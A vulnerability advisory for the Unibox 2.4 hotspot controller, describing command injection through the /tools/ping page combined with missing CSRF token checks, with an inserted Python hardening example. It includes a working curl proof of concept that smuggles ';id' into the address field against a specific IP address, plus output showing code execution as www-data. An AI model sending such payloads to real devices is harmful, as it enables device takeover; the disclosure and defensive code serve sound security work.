Unibox 2.4 CSRF / Remote Code Execution

Unibox version 2.4 suffers from remote code execution and cross site request forgery vulnerabilities.

About the Product:
==================
UniBox is one of the most innovative and reliable Hotspot Controllers in
the market today. You can install UniBox to manage any sized WiFi
network without having to replace any existing infrastructure. With
UniBox, you don't need any other solution for managing WiFi access. It
comes packed with features so just one box is enough to handle all the
functions of WiFi hotspots.

Description:
============
An issue was discovered on Unibox SMB running Unibox 2.4, and it potentially
affects all other devices. There is a code execution vulnerability via the
/tools/ping function of the device which leads to complete device takeover.

Additional Information
======================
The page /tools/ping can be tricked via a specially crafted request which
leads to code execution on the device. The device also does not validate
the csrftoken, hence by combining these two issues an attacker can obtain
authenticated remote code execution on the device, leading to complete
device takeover.
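The two weaknesses described above (a ping target that reaches a shell unchecked, and a missing csrftoken check) are what a hardened handler has to close. The following is an added example, not code from the advisory or from the Unibox product: a strict allow-list validator for the address parameter, a constant-time csrftoken comparison, and a small form-body parser, run over constructed request bodies including the advisory's own PoC body "pingaction=1&address=1;id". The parameter name csrftoken, the session token and the sample bodies are assumptions for the illustration.

```python
"""
Added defensive example (not part of the original advisory or the Unibox
product): allow-list validation of a ping target plus a CSRF token check,
exercised on constructed request bodies.
"""
import hmac
import ipaddress
import re
import secrets
from typing import Optional
from urllib.parse import unquote_plus

# RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ping_target(value: str) -> bool:
    """Accept only a literal IP address or a plain hostname.

    Anything else (shell metacharacters, whitespace, empty input) is rejected
    before the value could ever reach a shell.  Allow-listing the accepted
    syntax is safer than deny-listing characters such as ';' or '|'.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def csrf_token_valid(session_token: Optional[str], submitted: Optional[str]) -> bool:
    """Constant-time comparison of the per-session token against the form value."""
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


def parse_form_body(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser (first value wins).

    Splits on '&' only, so a ';' inside a value stays part of that value,
    which is exactly what the validator must then see and reject.
    """
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def handle_ping_request(body: str, session_token: str) -> tuple:
    """Decide how a hardened /tools/ping handler would answer a POST body.

    Returns (HTTP status, reason).  No ping is executed here; a real handler
    would pass the validated target as an argv element, e.g.
    subprocess.run(["ping", "-c", "4", target]), never through a shell.
    """
    params = parse_form_body(body)
    if not csrf_token_valid(session_token, params.get("csrftoken")):
        return 403, "missing or invalid CSRF token"
    target = params.get("address", "")
    if not is_valid_ping_target(target):
        return 400, "address is not a hostname or IP literal"
    return 200, f"would run: ping -c 4 {target}"


# Constructed sample: the per-session token a hardened app would issue.
SESSION_TOKEN = secrets.token_hex(16)

# Constructed request bodies.  The first is the advisory's PoC body verbatim.
SAMPLE_BODIES = [
    "pingaction=1&address=1;id",
    f"pingaction=1&address=1;id&csrftoken={SESSION_TOKEN}",
    f"pingaction=1&address=8.8.8.8&csrftoken={SESSION_TOKEN}",
    f"pingaction=1&address=example.com&csrftoken={SESSION_TOKEN}",
    f"pingaction=1&address=$(id)&csrftoken={SESSION_TOKEN}",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        status, reason = handle_ping_request(body, SESSION_TOKEN)
        print(f"{status} {reason:42s} <- {body}")
```

The order of the checks matters: the CSRF check runs first so a cross-site POST is refused before any parameter is even looked at, and the validator accepts syntax rather than searching for bad characters, so payload variants that avoid ';' are rejected just the same.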

[Vulnerability Type]
====================
Remote Code Execution (RCE)
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
curl -i -s -k -X $'POST' \
  -H $'Host: 136.232.224.22' \
  -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H $'Accept-Language: en-US,en;q=0.5' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Referer: http://136.232.224.22/tools/ping' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 25' \
  -H $'Connection: close' \
  -H $'Cookie: PHPSESSID=k4l9or0l5xxxxxxxxxxx' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -b $'PHPSESSID=k4l9oxxxxxxxxxx' \
  --data-binary $'pingaction=1&address=1;id' \
  $'http://136.232.224.22/tools/ping'

Sample Output
-------------
<table width=100%>
<tr>
<td>
<br>
</td>
</tr>
<tr>
<td id='pingResponseTable'>
<table border="1" bordercolordark='#E0E0E0'
bordercolorlight='#000000' class="search" cellpadding="0" cellspacing="0">
<tr style='background-color:#3F6C96'>
<td>
<font color="white">
<b> Ping Status</b>
</font>
</td>
<br>
</tr>
<tr style='background-color:#D8E4F8'>
<td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
<br>
</td>
</tr>
</table>


[Affected Component]
/tools/ping

------------------------------------------

[Attack Type]
Remote

------------------------------------------